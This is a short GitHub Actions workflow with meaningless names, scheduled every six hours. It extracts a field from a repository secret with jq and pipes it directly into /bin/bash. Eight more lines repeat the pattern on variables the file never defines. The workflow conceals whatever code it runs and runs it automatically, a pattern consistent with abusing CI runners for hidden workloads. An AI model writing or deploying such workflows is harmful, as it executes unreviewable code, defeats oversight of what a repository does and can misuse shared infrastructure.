name: curiouslively
on:
  workflow_dispatch:
  schedule:
    - cron: '5 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: curiouslively
        env:
          kr774: ${{ secrets.kr774 }}
        run: |
          echo $kr774 | jq -r .sit98068 | /bin/bash
          echo $xb8853 | jq -r .qopq62435 | /bin/bash
          echo $c8 | jq -r .c11736 | /bin/bash
          echo $ob6 | jq -r .epkt555 | /bin/bash
          echo $g8 | jq -r .wm854 | /bin/bash
          echo $ziyfg83787 | jq -r .q0 | /bin/bash
          echo $hura1 | jq -r .ozvgc397 | /bin/bash
          echo $ihq74 | jq -r .x0 | /bin/bash
          echo $r29 | jq -r .kj8 | /bin/bash

